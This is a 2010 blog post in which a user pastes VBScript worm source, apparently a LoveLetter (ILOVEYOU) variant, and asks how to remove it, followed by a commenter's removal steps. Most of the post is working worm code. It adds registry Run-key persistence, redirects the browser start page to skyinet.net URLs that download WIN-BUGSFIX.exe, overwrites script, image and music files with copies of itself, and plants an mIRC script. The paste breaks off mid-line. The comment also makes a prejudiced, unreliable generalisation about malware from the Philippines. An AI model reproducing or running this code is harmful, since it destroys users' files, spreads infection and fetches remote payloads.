How to reverse engineer this code?

Posted by Admin on June 6, 2010 Leave a comment (1) Go to comments

Ok so I was on this website, and they had this neat script. Well, I copied and pasted it into notepad, and tried to save it as a .txt file, you know, just to have. Well, it saved, but I couldn’t find it, and now my computer is screwed. Yes, it was stupid of me, but now nothing will get rid of it. Here is the code, I hope someone can make something out of it. Thanks in advance.
The code is inbetween StartCode and EndCode. If I wasn’t clear, I want to know how to get rid of this code, because no virus scan will get rid of it.
StartCode
xxx not porn -loveletter(vbe)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group /
Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=”"
ctr=0
Set fso = CreateObject(“Scripting.FileSystemObject”)
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject(“WScript.Shell”)
rr=wscr.RegRead(“HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout”)
if (rr>=1) then
wscr.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout”,0,”REG_DWORD”
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&”\MSKernel32.vbs”)
c.Copy(dirwin&”\Win32DLL.vbs”)
c.Copy(dirsystem&”\LOVE-LETTER-FOR-YOU.TXT.vbs”)
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
“,dirsystem&”\MSKernel32.vbs”
regcreate
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi
n32DLL”,dirwin&”\Win32DLL.vbs”
downread=”"
downread=regget(“HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Download Directory”)
if (downread=”") then
downread=”c:”
end if
if (fileexist(dirsystem&”\WinFAT32.exe”)=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate “HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page”,”http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe”
elseif num = 2 then
regcreate “HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page”,”http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe”
elseif num = 3 then
regcreate “HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page”,”http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe”
elseif num = 4 then
regcreate “HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page”,”http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX
.exe”
end if
end if
if (fileexist(downread&”\WIN-BUGSFIX.exe”)=0) then
regcreate
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFI
X”,downread&”\WIN-BUGSFIX.exe”
regcreate “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page”,”about:blank”
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&”")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext=”vbs”) or (ext=”vbe”) then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext=”js”) or (ext=”jse”) or (ext=”css”) or (ext=”wsh”) or (ext=”sct”)
or (ext=”hta”) then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&”"&bname&”.vbs”)
fso.DeleteFile(f1.path)
elseif(ext=”jpg”) or (ext=”jpeg”) then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&”.vbs”)
fso.DeleteFile(f1.path)
elseif(ext=”mp3″) or (ext=”mp2″) then
set mp3=fso.CreateTextFile(f1.path&”.vbs”)
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s=”mirc32.exe”) or (s=”mlink32.exe”) or (s=”mirc.ini”) or
(s=”script.ini”) or (s=”mirc.hlp”) then
set scriptini=fso.CreateTextFile(folderspec&”\script.ini”)
scriptini.WriteLine “[script]”
scriptini.WriteLine “;mIRC Script”
scriptini.WriteLine “; Please dont edit this script… mIRC will corrupt,
if mIRC will”
scriptini.WriteLine ” corrupt… WINDOWS will affect and will not run
correctly. thanks”
scriptini.WriteLine “;”
scriptini.WriteLine “;Khaled Mardam-Bey”
scriptini.WriteL
I’m scared of the registry editer, it’s so intimidating, what if I delete something that’ll screw up my computer up even more than before? The dll file looks rather important, but I don’t know what I’m doing. The pages I believe makes pop-ups, so you’d type something in google, and something would pop up every time. Really annoying. And something called infosteeler was caught by my virus protection, and windows defender. Hmmm…

Related Blogs

Related Blogs on How to reverse engineer this code?

InfoCode, engineer, ext, fso, internet explorer download, Manila, microsoft windows scripting host, path, Philippines, REG, reverse, this, wscript shell

← Reverse engineering techniques to find security bugs: A…

Free UML Tool that can reverse engineer Java code (java version 1.6) – for Windows Vista!? →

Leave a comment ?
1 Comments.

chris June 6, 2010 at 4:13 PM

Your first mistake was saving a script from the Philippines. This is where the majority of malware comes from.

This script is written in Visual Basic Script… a common trait of viruses from the Philippines… they’re all written in relatively simple languages like batch and VBS.

I like the trademark AWFUL coding…

It looks like… a re-engineered version of the love letter virus.

Here’s what it looks like it’s doing (I’m not VBS programmer but I can understand most of it):

It creates the following registry keys:

“HKEY_CURRENT_USERSoftwareMicrosoft…
HostSettingsTimeout”,0,”REG_DWORD”

“HKEY_LOCAL_MACHINESoftwareMicrosoft…
“,dirsystem&”MSKernel32.vbs”

“HKEY_LOCAL_MACHINESoftwareMicrosoft…
n32DLL”,dirwin&”Win32DLL.vbs”

Looks like it runs itself on startup or something. These keys are incomplete so I can’t tell…

It creates these registry keys:

HKCUSoftwareMicrosoftInternet ExplorerMainStart
Page”,”http://www.skyinet.net/~young1s…
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.ex… ExplorerMainStart
Page”,”http://www.skyinet.net/~angelca…

They, I believe, block you from going to those websites, or change your IE homepage to one of them.

Then makes this registry key:
“HKEY_CURRENT_USERSoftwareMicrosoft… Scripting
HostSettingsTimeout”,0,”REG_DWORD”

It sends itself to a bunch of people…

Then tells you that if you edit it, you will corrupt windows, with awful english of course.

Click start (and run if you have XP) and type in “regedit”.
Navigate to HKEY_LOCAL_MACHINE, then to SOFTWARE, then MICROSOFT, then WINDOWS, then CURRENTVERSION, then RUN, then delete the key MSKERNEL32

Then find: HKEY_LOCAL_MACHINESoftwareMicrosoft
WindowsCurrentVersionRunServices
and delete Win 32DLL

Then find: HKEY_LOCAL_MACHINESoftwareMicrosoft
WindowsCurrentVersionRun
and delete WIN-BUGSFIX

Then find: HKEY_LOCAL_MACHINESoftwareMicrosoft
WindowsCurrentVersionRun
and delete WinFAT32=WinFAT32.EXE

That should be it.

It’s not a real .dll, that’s the point of this. Just delete what I said, it will be fine.

Leave a Comment Cancel reply

NAME

EMAIL

Website URL

Engineering Reverse

Great Info on Reverse Engineering